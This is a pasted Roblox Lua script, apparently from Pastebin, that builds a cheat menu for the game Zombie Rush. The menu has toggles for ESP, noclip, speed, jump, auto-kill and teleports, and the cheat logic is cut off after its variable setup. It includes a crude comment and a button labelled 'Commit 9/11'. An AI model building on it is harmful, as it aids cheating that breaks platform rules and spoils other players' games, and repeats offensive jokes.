Advertisement
unknownexploits

zombie_rush_ui_v2

Sep 6th, 2019
731
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 33.10 KB | None | 0 0
  1. -- By unknown_45273#2851
  2. -- Version 1.2
  3. -- Go pussy hunting with this shit dawg
  4. local zr_ui = Instance.new("ScreenGui")
  5. local teleports = Instance.new("Frame")
  6. local title = Instance.new("TextLabel")
  7. local map = Instance.new("TextButton")
  8. local TextLabel = Instance.new("TextLabel")
  9. local lobby = Instance.new("TextButton")
  10. local TextLabel_2 = Instance.new("TextLabel")
  11. local desc = Instance.new("TextLabel")
  12. local visual = Instance.new("Frame")
  13. local title_2 = Instance.new("TextLabel")
  14. local Esp = Instance.new("TextButton")
  15. local TextLabel_3 = Instance.new("TextLabel")
  16. local fullbright = Instance.new("TextButton")
  17. local TextLabel_4 = Instance.new("TextLabel")
  18. local nineeleven = Instance.new("TextButton")
  19. local TextLabel_5 = Instance.new("TextLabel")
  20. local desc_2 = Instance.new("TextLabel")
  21. local rggb = Instance.new("TextButton")
  22. local title_3 = Instance.new("TextLabel")
  23. local char = Instance.new("Frame")
  24. local title_4 = Instance.new("TextLabel")
  25. local superspeed = Instance.new("TextButton")
  26. local TextLabel_6 = Instance.new("TextLabel")
  27. local sjump = Instance.new("TextButton")
  28. local TextLabel_7 = Instance.new("TextLabel")
  29. local noclip = Instance.new("TextButton")
  30. local TextLabel_8 = Instance.new("TextLabel")
  31. local desc_3 = Instance.new("TextLabel")
  32. local flyingbutton = Instance.new("TextButton")
  33. local TextLabel_9 = Instance.new("TextLabel")
  34. local miscellaneous = Instance.new("Frame")
  35. local title_5 = Instance.new("TextLabel")
  36. local TextLabel_10 = Instance.new("TextLabel")
  37. local gravity = Instance.new("TextButton")
  38. local TextLabel_11 = Instance.new("TextLabel")
  39. local desc_4 = Instance.new("TextLabel")
  40. local log = Instance.new("Frame")
  41. local title_6 = Instance.new("TextLabel")
  42. local TextLabel_18 = Instance.new("TextLabel")
  43. local desc_5 = Instance.new("TextLabel")
  44. local TextLabel_19 = Instance.new("TextLabel")
  45. local TextLabel_20 = Instance.new("TextLabel")
  46. local ak = Instance.new("TextButton")
  47. --Properties:
  48. zr_ui.Name = "zr_ui"
  49. zr_ui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  50. zr_ui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  51. zr_ui.ResetOnSpawn = false
  52.  
  53. teleports.Name = "teleports"
  54. teleports.Parent = zr_ui
  55. teleports.Active = true
  56. teleports.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  57. teleports.BackgroundTransparency = 0.10999999940395
  58. teleports.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  59. teleports.BorderSizePixel = 2
  60. teleports.Position = UDim2.new(0.0327743888, 0, 0.168469861, 0)
  61. teleports.Size = UDim2.new(0, 291, 0, 54)
  62.  
  63. title.Name = "title"
  64. title.Parent = teleports
  65. title.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  66. title.BackgroundTransparency = 0.10999999940395
  67. title.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  68. title.BorderSizePixel = 2
  69. title.Position = UDim2.new(0, 0, -0.951489985, 0)
  70. title.Size = UDim2.new(0, 291, 0, 45)
  71. title.Font = Enum.Font.SourceSans
  72. title.Text = "Teleports n shit"
  73. title.TextColor3 = Color3.new(1, 1, 1)
  74. title.TextSize = 40
  75. title.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  76. title.TextStrokeTransparency = 0
  77. title.TextWrapped = true
  78.  
  79. map.Name = "map"
  80. map.Parent = teleports
  81. map.Active = false
  82. map.BackgroundColor3 = Color3.new(1, 1, 1)
  83. map.BackgroundTransparency = 1
  84. map.Position = UDim2.new(0.865979373, 0, 0.0925925896, 0)
  85. map.Size = UDim2.new(0, 39, 0, 23)
  86. map.Font = Enum.Font.Code
  87. map.Text = "OFF"
  88. map.TextColor3 = Color3.new(1, 0, 0)
  89. map.TextSize = 20
  90. map.TextWrapped = true
  91.  
  92. TextLabel.Parent = teleports
  93. TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
  94. TextLabel.BackgroundTransparency = 1
  95. TextLabel.BorderSizePixel = 0
  96. TextLabel.Position = UDim2.new(0.0240549836, 0, 0.0925925896, 0)
  97. TextLabel.Size = UDim2.new(0, 245, 0, 23)
  98. TextLabel.Font = Enum.Font.Code
  99. TextLabel.Text = "Map"
  100. TextLabel.TextColor3 = Color3.new(1, 1, 1)
  101. TextLabel.TextSize = 20
  102. TextLabel.TextXAlignment = Enum.TextXAlignment.Left
  103.  
  104. lobby.Name = "lobby"
  105. lobby.Parent = teleports
  106. lobby.Active = false
  107. lobby.BackgroundColor3 = Color3.new(1, 1, 1)
  108. lobby.BackgroundTransparency = 1
  109. lobby.Position = UDim2.new(0.865979373, 0, 0.531963229, 0)
  110. lobby.Size = UDim2.new(0, 39, 0, 23)
  111. lobby.Font = Enum.Font.Code
  112. lobby.Text = "OFF"
  113. lobby.TextColor3 = Color3.new(1, 0, 0)
  114. lobby.TextSize = 20
  115. lobby.TextWrapped = true
  116.  
  117. TextLabel_2.Parent = teleports
  118. TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
  119. TextLabel_2.BackgroundTransparency = 1
  120. TextLabel_2.BorderSizePixel = 0
  121. TextLabel_2.Position = UDim2.new(0.0240549836, 0, 0.531963229, 0)
  122. TextLabel_2.Size = UDim2.new(0, 245, 0, 23)
  123. TextLabel_2.Font = Enum.Font.Code
  124. TextLabel_2.Text = "Lobby"
  125. TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
  126. TextLabel_2.TextSize = 20
  127. TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left
  128.  
  129. desc.Name = "desc"
  130. desc.Parent = teleports
  131. desc.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  132. desc.BackgroundTransparency = 0.10999999940395
  133. desc.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  134. desc.BorderSizePixel = 2
  135. desc.Position = UDim2.new(0, 0, 1.11851859, 0)
  136. desc.Size = UDim2.new(0, 291, 0, 32)
  137. desc.Font = Enum.Font.SourceSans
  138. desc.Text = "Press 'Q' to toggle the ui \n Made by unknown_45273#2851"
  139. desc.TextColor3 = Color3.new(1, 1, 1)
  140. desc.TextScaled = true
  141. desc.TextSize = 19
  142. desc.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  143. desc.TextStrokeTransparency = 0
  144. desc.TextWrapped = true
  145.  
  146. visual.Name = "visual"
  147. visual.Parent = zr_ui
  148. visual.Active = true
  149. visual.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  150. visual.BackgroundTransparency = 0.10999999940395
  151. visual.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  152. visual.BorderSizePixel = 2
  153. visual.Position = UDim2.new(0.217507169, 0, 0.162287489, 0)
  154. visual.Size = UDim2.new(0, 291, 0, 99)
  155.  
  156. title_2.Name = "title"
  157. title_2.Parent = visual
  158. title_2.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  159. title_2.BackgroundTransparency = 0.10999999940395
  160. title_2.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  161. title_2.BorderSizePixel = 2
  162. title_2.Position = UDim2.new(0, 0, -0.518282831, 0)
  163. title_2.Size = UDim2.new(0, 291, 0, 45)
  164. title_2.Font = Enum.Font.SourceSans
  165. title_2.Text = "Visual Cheatz"
  166. title_2.TextColor3 = Color3.new(1, 1, 1)
  167. title_2.TextSize = 40
  168. title_2.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  169. title_2.TextStrokeTransparency = 0
  170. title_2.TextWrapped = true
  171.  
  172. Esp.Name = "Esp"
  173. Esp.Parent = visual
  174. Esp.Active = false
  175. Esp.BackgroundColor3 = Color3.new(1, 1, 1)
  176. Esp.BackgroundTransparency = 1
  177. Esp.Position = UDim2.new(0.865979373, 0, 0.0627325922, 0)
  178. Esp.Size = UDim2.new(0, 39, 0, 23)
  179. Esp.Font = Enum.Font.Code
  180. Esp.Text = "OFF"
  181. Esp.TextColor3 = Color3.new(1, 0, 0)
  182. Esp.TextSize = 20
  183. Esp.TextWrapped = true
  184.  
  185. TextLabel_3.Parent = visual
  186. TextLabel_3.BackgroundColor3 = Color3.new(1, 1, 1)
  187. TextLabel_3.BackgroundTransparency = 1
  188. TextLabel_3.BorderSizePixel = 0
  189. TextLabel_3.Position = UDim2.new(0.0240549836, 0, 0.0627325922, 0)
  190. TextLabel_3.Size = UDim2.new(0, 245, 0, 23)
  191. TextLabel_3.Font = Enum.Font.Code
  192. TextLabel_3.Text = "Esp"
  193. TextLabel_3.TextColor3 = Color3.new(1, 1, 1)
  194. TextLabel_3.TextSize = 20
  195. TextLabel_3.TextXAlignment = Enum.TextXAlignment.Left
  196.  
  197. fullbright.Name = "fullbright"
  198. fullbright.Parent = visual
  199. fullbright.Active = false
  200. fullbright.BackgroundColor3 = Color3.new(1, 1, 1)
  201. fullbright.BackgroundTransparency = 1
  202. fullbright.Position = UDim2.new(0.865979373, 0, 0.281422913, 0)
  203. fullbright.Size = UDim2.new(0, 39, 0, 23)
  204. fullbright.Font = Enum.Font.Code
  205. fullbright.Text = "OFF"
  206. fullbright.TextColor3 = Color3.new(1, 0, 0)
  207. fullbright.TextSize = 20
  208. fullbright.TextWrapped = true
  209.  
  210. TextLabel_4.Parent = visual
  211. TextLabel_4.BackgroundColor3 = Color3.new(1, 1, 1)
  212. TextLabel_4.BackgroundTransparency = 1
  213. TextLabel_4.BorderSizePixel = 0
  214. TextLabel_4.Position = UDim2.new(0.0240549836, 0, 0.281422913, 0)
  215. TextLabel_4.Size = UDim2.new(0, 245, 0, 23)
  216. TextLabel_4.Font = Enum.Font.Code
  217. TextLabel_4.Text = "Fullbright"
  218. TextLabel_4.TextColor3 = Color3.new(1, 1, 1)
  219. TextLabel_4.TextSize = 20
  220. TextLabel_4.TextXAlignment = Enum.TextXAlignment.Left
  221.  
  222. nineeleven.Name = "nineeleven"
  223. nineeleven.Parent = visual
  224. nineeleven.Active = false
  225. nineeleven.BackgroundColor3 = Color3.new(1, 1, 1)
  226. nineeleven.BackgroundTransparency = 1
  227. nineeleven.Position = UDim2.new(0.865979373, 0, 0.498740584, 0)
  228. nineeleven.Size = UDim2.new(0, 39, 0, 23)
  229. nineeleven.Font = Enum.Font.Code
  230. nineeleven.Text = "OFF"
  231. nineeleven.TextColor3 = Color3.new(1, 0, 0)
  232. nineeleven.TextSize = 20
  233. nineeleven.TextWrapped = true
  234.  
  235. TextLabel_5.Parent = visual
  236. TextLabel_5.BackgroundColor3 = Color3.new(1, 1, 1)
  237. TextLabel_5.BackgroundTransparency = 1
  238. TextLabel_5.BorderSizePixel = 0
  239. TextLabel_5.Position = UDim2.new(0.0240549836, 0, 0.498740584, 0)
  240. TextLabel_5.Size = UDim2.new(0, 245, 0, 23)
  241. TextLabel_5.Font = Enum.Font.Code
  242. TextLabel_5.Text = "Commit 9/11"
  243. TextLabel_5.TextColor3 = Color3.new(1, 1, 1)
  244. TextLabel_5.TextSize = 20
  245. TextLabel_5.TextXAlignment = Enum.TextXAlignment.Left
  246.  
  247. desc_2.Name = "desc"
  248. desc_2.Parent = visual
  249. desc_2.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  250. desc_2.BackgroundTransparency = 0.10999999940395
  251. desc_2.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  252. desc_2.BorderSizePixel = 2
  253. desc_2.Position = UDim2.new(0, 0, 1.08000004, 0)
  254. desc_2.Size = UDim2.new(0, 291, 0, 32)
  255. desc_2.Font = Enum.Font.SourceSans
  256. desc_2.Text = "Press 'Q' to toggle the ui \n Made by unknown_45273#2851"
  257. desc_2.TextColor3 = Color3.new(1, 1, 1)
  258. desc_2.TextScaled = true
  259. desc_2.TextSize = 19
  260. desc_2.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  261. desc_2.TextStrokeTransparency = 0
  262. desc_2.TextWrapped = true
  263.  
  264. rggb.Name = "rggb"
  265. rggb.Parent = visual
  266. rggb.Active = false
  267. rggb.BackgroundColor3 = Color3.new(1, 1, 1)
  268. rggb.BackgroundTransparency = 1
  269. rggb.Position = UDim2.new(0.865979373, 0, 0.725198746, 0)
  270. rggb.Size = UDim2.new(0, 39, 0, 23)
  271. rggb.Font = Enum.Font.Code
  272. rggb.Text = "OFF"
  273. rggb.TextColor3 = Color3.new(1, 0, 0)
  274. rggb.TextSize = 20
  275. rggb.TextWrapped = true
  276.  
  277. title_3.Name = "title"
  278. title_3.Parent = visual
  279. title_3.BackgroundColor3 = Color3.new(1, 1, 1)
  280. title_3.BackgroundTransparency = 1
  281. title_3.BorderSizePixel = 0
  282. title_3.Position = UDim2.new(0.0240549836, 0, 0.725198746, 0)
  283. title_3.Size = UDim2.new(0, 245, 0, 23)
  284. title_3.Font = Enum.Font.Code
  285. title_3.Text = "Rgb"
  286. title_3.TextColor3 = Color3.new(1, 1, 1)
  287. title_3.TextSize = 20
  288. title_3.TextXAlignment = Enum.TextXAlignment.Left
  289.  
  290. char.Name = "char"
  291. char.Parent = zr_ui
  292. char.Active = true
  293. char.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  294. char.BackgroundTransparency = 0.10999999940395
  295. char.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  296. char.BorderSizePixel = 2
  297. char.Position = UDim2.new(0.401092917, 0, 0.154559508, 0)
  298. char.Size = UDim2.new(0, 291, 0, 99)
  299.  
  300. title_4.Name = "title"
  301. title_4.Parent = char
  302. title_4.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  303. title_4.BackgroundTransparency = 0.10999999940395
  304. title_4.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  305. title_4.BorderSizePixel = 2
  306. title_4.Position = UDim2.new(0, 0, -0.528383851, 0)
  307. title_4.Size = UDim2.new(0, 291, 0, 45)
  308. title_4.Font = Enum.Font.SourceSans
  309. title_4.Text = "Character Cheatz"
  310. title_4.TextColor3 = Color3.new(1, 1, 1)
  311. title_4.TextSize = 40
  312. title_4.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  313. title_4.TextStrokeTransparency = 0
  314. title_4.TextWrapped = true
  315.  
  316. superspeed.Name = "superspeed"
  317. superspeed.Parent = char
  318. superspeed.Active = false
  319. superspeed.BackgroundColor3 = Color3.new(1, 1, 1)
  320. superspeed.BackgroundTransparency = 1
  321. superspeed.Position = UDim2.new(0.865979373, 0, 0.00443881005, 0)
  322. superspeed.Size = UDim2.new(0, 39, 0, 23)
  323. superspeed.Font = Enum.Font.Code
  324. superspeed.Text = "OFF"
  325. superspeed.TextColor3 = Color3.new(1, 0, 0)
  326. superspeed.TextSize = 20
  327. superspeed.TextWrapped = true
  328.  
  329. TextLabel_6.Parent = char
  330. TextLabel_6.BackgroundColor3 = Color3.new(1, 1, 1)
  331. TextLabel_6.BackgroundTransparency = 1
  332. TextLabel_6.BorderSizePixel = 0
  333. TextLabel_6.Position = UDim2.new(0.0240549836, 0, 0.00443881005, 0)
  334. TextLabel_6.Size = UDim2.new(0, 245, 0, 23)
  335. TextLabel_6.Font = Enum.Font.Code
  336. TextLabel_6.Text = "Super Speed"
  337. TextLabel_6.TextColor3 = Color3.new(1, 1, 1)
  338. TextLabel_6.TextSize = 20
  339. TextLabel_6.TextXAlignment = Enum.TextXAlignment.Left
  340.  
  341. sjump.Name = "sjump"
  342. sjump.Parent = char
  343. sjump.Active = false
  344. sjump.BackgroundColor3 = Color3.new(1, 1, 1)
  345. sjump.BackgroundTransparency = 1
  346. sjump.Position = UDim2.new(0.865979373, 0, 0.228334725, 0)
  347. sjump.Size = UDim2.new(0, 39, 0, 23)
  348. sjump.Font = Enum.Font.Code
  349. sjump.Text = "OFF"
  350. sjump.TextColor3 = Color3.new(1, 0, 0)
  351. sjump.TextSize = 20
  352. sjump.TextWrapped = true
  353.  
  354. TextLabel_7.Parent = char
  355. TextLabel_7.BackgroundColor3 = Color3.new(1, 1, 1)
  356. TextLabel_7.BackgroundTransparency = 1
  357. TextLabel_7.BorderSizePixel = 0
  358. TextLabel_7.Position = UDim2.new(0.0240549836, 0, 0.228334725, 0)
  359. TextLabel_7.Size = UDim2.new(0, 245, 0, 23)
  360. TextLabel_7.Font = Enum.Font.Code
  361. TextLabel_7.Text = "Super Jump"
  362. TextLabel_7.TextColor3 = Color3.new(1, 1, 1)
  363. TextLabel_7.TextSize = 20
  364. TextLabel_7.TextXAlignment = Enum.TextXAlignment.Left
  365.  
  366. noclip.Name = "noclip"
  367. noclip.Parent = char
  368. noclip.Active = false
  369. noclip.BackgroundColor3 = Color3.new(1, 1, 1)
  370. noclip.BackgroundTransparency = 1
  371. noclip.Position = UDim2.new(0.865979373, 0, 0.484768748, 0)
  372. noclip.Size = UDim2.new(0, 39, 0, 23)
  373. noclip.Font = Enum.Font.Code
  374. noclip.Text = "OFF"
  375. noclip.TextColor3 = Color3.new(1, 0, 0)
  376. noclip.TextSize = 20
  377. noclip.TextWrapped = true
  378.  
  379. TextLabel_8.Parent = char
  380. TextLabel_8.BackgroundColor3 = Color3.new(1, 1, 1)
  381. TextLabel_8.BackgroundTransparency = 1
  382. TextLabel_8.BorderSizePixel = 0
  383. TextLabel_8.Position = UDim2.new(0.0240549836, 0, 0.484768748, 0)
  384. TextLabel_8.Size = UDim2.new(0, 245, 0, 23)
  385. TextLabel_8.Font = Enum.Font.Code
  386. TextLabel_8.Text = "Noclip"
  387. TextLabel_8.TextColor3 = Color3.new(1, 1, 1)
  388. TextLabel_8.TextSize = 20
  389. TextLabel_8.TextXAlignment = Enum.TextXAlignment.Left
  390.  
  391. desc_3.Name = "desc"
  392. desc_3.Parent = char
  393. desc_3.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  394. desc_3.BackgroundTransparency = 0.10999999940395
  395. desc_3.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  396. desc_3.BorderSizePixel = 2
  397. desc_3.Position = UDim2.new(0, 0, 1.05999994, 0)
  398. desc_3.Size = UDim2.new(0, 291, 0, 32)
  399. desc_3.Font = Enum.Font.SourceSans
  400. desc_3.Text = "Press 'Q' to toggle the ui \n Made by unknown_45273#2851"
  401. desc_3.TextColor3 = Color3.new(1, 1, 1)
  402. desc_3.TextScaled = true
  403. desc_3.TextSize = 19
  404. desc_3.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  405. desc_3.TextStrokeTransparency = 0
  406. desc_3.TextWrapped = true
  407.  
  408. flyingbutton.Name = "flyingbutton"
  409. flyingbutton.Parent = char
  410. flyingbutton.Active = false
  411. flyingbutton.BackgroundColor3 = Color3.new(1, 1, 1)
  412. flyingbutton.BackgroundTransparency = 1
  413. flyingbutton.Position = UDim2.new(0.865979373, 0, 0.717092037, 0)
  414. flyingbutton.Size = UDim2.new(0, 39, 0, 23)
  415. flyingbutton.Font = Enum.Font.Code
  416. flyingbutton.Text = "OFF"
  417. flyingbutton.TextColor3 = Color3.new(1, 0, 0)
  418. flyingbutton.TextSize = 20
  419. flyingbutton.TextWrapped = true
  420.  
  421. TextLabel_9.Parent = char
  422. TextLabel_9.BackgroundColor3 = Color3.new(1, 1, 1)
  423. TextLabel_9.BackgroundTransparency = 1
  424. TextLabel_9.BorderSizePixel = 0
  425. TextLabel_9.Position = UDim2.new(0.0240549836, 0, 0.717092037, 0)
  426. TextLabel_9.Size = UDim2.new(0, 245, 0, 23)
  427. TextLabel_9.Font = Enum.Font.Code
  428. TextLabel_9.Text = "Fly (Disabled atm)"
  429. TextLabel_9.TextColor3 = Color3.new(1, 1, 1)
  430. TextLabel_9.TextSize = 20
  431. TextLabel_9.TextXAlignment = Enum.TextXAlignment.Left
  432.  
  433. miscellaneous.Name = "miscellaneous"
  434. miscellaneous.Parent = zr_ui
  435. miscellaneous.Active = true
  436. miscellaneous.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  437. miscellaneous.BackgroundTransparency = 0.10999999940395
  438. miscellaneous.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  439. miscellaneous.BorderSizePixel = 2
  440. miscellaneous.Position = UDim2.new(0.591606617, 0, 0.154559493, 0)
  441. miscellaneous.Size = UDim2.new(0, 291, 0, 57)
  442.  
  443. title_5.Name = "title"
  444. title_5.Parent = miscellaneous
  445. title_5.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  446. title_5.BackgroundTransparency = 0.10999999940395
  447. title_5.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  448. title_5.BorderSizePixel = 2
  449. title_5.Position = UDim2.new(0, 0, -0.935614049, 0)
  450. title_5.Size = UDim2.new(0, 291, 0, 45)
  451. title_5.Font = Enum.Font.SourceSans
  452. title_5.Text = "Miscellaneous Cheats"
  453. title_5.TextColor3 = Color3.new(1, 1, 1)
  454. title_5.TextScaled = true
  455. title_5.TextSize = 25
  456. title_5.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  457. title_5.TextStrokeTransparency = 0
  458. title_5.TextWrapped = true
  459.  
  460. TextLabel_10.Parent = miscellaneous
  461. TextLabel_10.BackgroundColor3 = Color3.new(1, 1, 1)
  462. TextLabel_10.BackgroundTransparency = 1
  463. TextLabel_10.BorderSizePixel = 0
  464. TextLabel_10.Position = UDim2.new(0.0240549836, 0, 0.0526315793, 0)
  465. TextLabel_10.Size = UDim2.new(0, 245, 0, 23)
  466. TextLabel_10.Font = Enum.Font.Code
  467. TextLabel_10.Text = "Auto Kill"
  468. TextLabel_10.TextColor3 = Color3.new(1, 1, 1)
  469. TextLabel_10.TextSize = 20
  470. TextLabel_10.TextXAlignment = Enum.TextXAlignment.Left
  471.  
  472. gravity.Name = "gravity"
  473. gravity.Parent = miscellaneous
  474. gravity.Active = false
  475. gravity.BackgroundColor3 = Color3.new(1, 1, 1)
  476. gravity.BackgroundTransparency = 1
  477. gravity.Position = UDim2.new(0.865979373, 0, 0.485638261, 0)
  478. gravity.Size = UDim2.new(0, 39, 0, 23)
  479. gravity.Font = Enum.Font.Code
  480. gravity.Text = "OFF"
  481. gravity.TextColor3 = Color3.new(1, 0, 0)
  482. gravity.TextSize = 20
  483. gravity.TextWrapped = true
  484.  
  485. TextLabel_11.Parent = miscellaneous
  486. TextLabel_11.BackgroundColor3 = Color3.new(1, 1, 1)
  487. TextLabel_11.BackgroundTransparency = 1
  488. TextLabel_11.BorderSizePixel = 0
  489. TextLabel_11.Position = UDim2.new(0.0240549836, 0, 0.485638261, 0)
  490. TextLabel_11.Size = UDim2.new(0, 245, 0, 23)
  491. TextLabel_11.Font = Enum.Font.Code
  492. TextLabel_11.Text = "Low Gravity"
  493. TextLabel_11.TextColor3 = Color3.new(1, 1, 1)
  494. TextLabel_11.TextSize = 20
  495. TextLabel_11.TextXAlignment = Enum.TextXAlignment.Left
  496.  
  497. desc_4.Name = "desc"
  498. desc_4.Parent = miscellaneous
  499. desc_4.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  500. desc_4.BackgroundTransparency = 0.10999999940395
  501. desc_4.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  502. desc_4.BorderSizePixel = 2
  503. desc_4.Position = UDim2.new(0, 0, 1.11508775, 0)
  504. desc_4.Size = UDim2.new(0, 291, 0, 32)
  505. desc_4.Font = Enum.Font.SourceSans
  506. desc_4.Text = "Press 'Q' to toggle the ui \n Made by unknown_45273#2851"
  507. desc_4.TextColor3 = Color3.new(1, 1, 1)
  508. desc_4.TextScaled = true
  509. desc_4.TextSize = 19
  510. desc_4.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  511. desc_4.TextStrokeTransparency = 0
  512. desc_4.TextWrapped = true
  513.  
  514. ak.Name = "ak"
  515. ak.Parent = miscellaneous
  516. ak.Active = false
  517. ak.BackgroundColor3 = Color3.new(1, 1, 1)
  518. ak.BackgroundTransparency = 1
  519. ak.Position = UDim2.new(0.865979373, 0, 0.0526315793, 0)
  520. ak.Size = UDim2.new(0, 39, 0, 23)
  521. ak.Font = Enum.Font.Code
  522. ak.Text = "OFF"
  523. ak.TextColor3 = Color3.new(1, 0, 0)
  524. ak.TextSize = 20
  525. ak.TextWrapped = true
  526.  
  527. log.Name = "log"
  528. log.Parent = zr_ui
  529. log.Active = true
  530. log.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  531. log.BackgroundTransparency = 0.10999999940395
  532. log.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  533. log.BorderSizePixel = 2
  534. log.Position = UDim2.new(0.779762089, 0, 0.154559493, 0)
  535. log.Size = UDim2.new(0, 291, 0, 112)
  536.  
  537. title_6.Name = "title"
  538. title_6.Parent = log
  539. title_6.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  540. title_6.BackgroundTransparency = 0.10999999940395
  541. title_6.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  542. title_6.BorderSizePixel = 2
  543. title_6.Position = UDim2.new(0, 0, -0.470678926, 0)
  544. title_6.Size = UDim2.new(0, 291, 0, 45)
  545. title_6.Font = Enum.Font.SourceSans
  546. title_6.Text = "Changelog"
  547. title_6.TextColor3 = Color3.new(1, 1, 1)
  548. title_6.TextScaled = true
  549. title_6.TextSize = 25
  550. title_6.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  551. title_6.TextStrokeTransparency = 0
  552. title_6.TextWrapped = true
  553.  
  554. TextLabel_18.Parent = log
  555. TextLabel_18.BackgroundColor3 = Color3.new(1, 1, 1)
  556. TextLabel_18.BackgroundTransparency = 1
  557. TextLabel_18.BorderSizePixel = 0
  558. TextLabel_18.Position = UDim2.new(0.0240549836, 0, 0.229307041, 0)
  559. TextLabel_18.Size = UDim2.new(0, 245, 0, 19)
  560. TextLabel_18.Font = Enum.Font.Code
  561. TextLabel_18.Text = "[+] Added Changelog \n[+] Decided to fix 9/11 yey"
  562. TextLabel_18.TextColor3 = Color3.new(1, 1, 1)
  563. TextLabel_18.TextSize = 20
  564. TextLabel_18.TextXAlignment = Enum.TextXAlignment.Left
  565.  
  566. desc_5.Name = "desc"
  567. desc_5.Parent = log
  568. desc_5.BackgroundColor3 = Color3.new(0.12549, 0.12549, 0.12549)
  569. desc_5.BackgroundTransparency = 0.10999999940395
  570. desc_5.BorderColor3 = Color3.new(0.556863, 0.109804, 1)
  571. desc_5.BorderSizePixel = 2
  572. desc_5.Position = UDim2.new(0, 0, 1.10615921, 0)
  573. desc_5.Size = UDim2.new(0, 291, 0, 32)
  574. desc_5.Font = Enum.Font.SourceSans
  575. desc_5.Text = "Press 'Q' to toggle the ui \n Made by unknown_45273#2851"
  576. desc_5.TextColor3 = Color3.new(1, 1, 1)
  577. desc_5.TextScaled = true
  578. desc_5.TextSize = 19
  579. desc_5.TextStrokeColor3 = Color3.new(0.556863, 0.109804, 1)
  580. desc_5.TextStrokeTransparency = 0
  581. desc_5.TextWrapped = true
  582.  
  583. TextLabel_19.Parent = log
  584. TextLabel_19.BackgroundColor3 = Color3.new(1, 1, 1)
  585. TextLabel_19.BackgroundTransparency = 1
  586. TextLabel_19.BorderSizePixel = 0
  587. TextLabel_19.Position = UDim2.new(0.0240549836, 0, 0.440833092, 0)
  588. TextLabel_19.Size = UDim2.new(0, 284, 0, 49)
  589. TextLabel_19.Font = Enum.Font.Code
  590. TextLabel_19.Text = "[+] Added the map teleport button \n[+] Flying toggle coming soon"
  591. TextLabel_19.TextColor3 = Color3.new(1, 1, 1)
  592. TextLabel_19.TextSize = 20
  593. TextLabel_19.TextWrapped = true
  594. TextLabel_19.TextXAlignment = Enum.TextXAlignment.Left
  595.  
  596. TextLabel_20.Parent = log
  597. TextLabel_20.BackgroundColor3 = Color3.new(1, 1, 1)
  598. TextLabel_20.BackgroundTransparency = 1
  599. TextLabel_20.BorderSizePixel = 0
  600. TextLabel_20.Position = UDim2.new(0.0240549836, 0, 0.00798866898, 0)
  601. TextLabel_20.Size = UDim2.new(0, 245, 0, 18)
  602. TextLabel_20.Font = Enum.Font.Code
  603. TextLabel_20.Text = "Version 1.2"
  604. TextLabel_20.TextColor3 = Color3.new(1, 1, 1)
  605. TextLabel_20.TextSize = 20
  606. TextLabel_20.TextXAlignment = Enum.TextXAlignment.Left
  607. -- Scripts:
  608. function SCRIPT_MJOV70_FAKESCRIPT() -- zr_ui.LocalScript
  609. local script = Instance.new('LocalScript')
  610. script.Parent = zr_ui
  611. --Variables
  612. billui = Instance.new("BillboardGui");
  613. frame = Instance.new("Frame", billui);
  614.  
  615. billui.AlwaysOnTop = true;
  616. billui.LightInfluence = 0;
  617. billui.Size = UDim2.new(1.75, 0, 1.75, 0);
  618. frame.BackgroundColor3 = Color3.fromRGB(142, 28, 255);
  619. frame.Size = UDim2.new(1, 0, 1, 0);
  620. frame.BorderSizePixel = 2
  621. frame.BorderColor3 = Color3.fromRGB(255, 255, 255);
  622. map = workspace['Map Storage']:FindFirstChildOfClass('Model');
  623. rgb = script.Parent.visual.rggb;
  624. counter = 0;
  625. nineelev = script.Parent.visual.nineeleven;
  626. fbright = script.Parent.visual.fullbright;
  627. sspeed = script.Parent.char.superspeed;
  628. jpower = script.Parent.char.sjump;
  629. lowgravity = script.Parent.miscellaneous.gravity;
  630. noclip = script.Parent.char.noclip;
  631. lobby = script.Parent.teleports.lobby;
  632. autokill = script.Parent.miscellaneous.ak;
  633. esp = script.Parent.visual.Esp;
  634. maptp = script.Parent.teleports.map;
  635. ui = script.Parent;
  636. hk = Enum.KeyCode.Q;
